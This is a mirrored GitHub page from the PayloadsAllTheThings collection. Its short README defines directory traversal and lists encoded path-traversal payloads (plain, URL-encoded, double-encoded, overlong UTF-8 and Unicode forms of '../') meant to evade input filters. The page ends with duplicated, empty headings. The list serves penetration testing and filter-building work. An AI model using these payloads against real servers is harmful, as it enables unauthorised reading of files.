mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-13 23:02:46 +00:00

History

swisskyrepo 4dcb7cc6ea Traversal Directory payloads		2016-10-19 07:51:24 +07:00
..
README.md	Traversal Directory payloads	2016-10-19 07:51:24 +07:00

README.md

Traversal Directory

A directory traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.

Exploit

../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
..././
...\.\

README.md

Traversal Directory

Exploit

Thanks to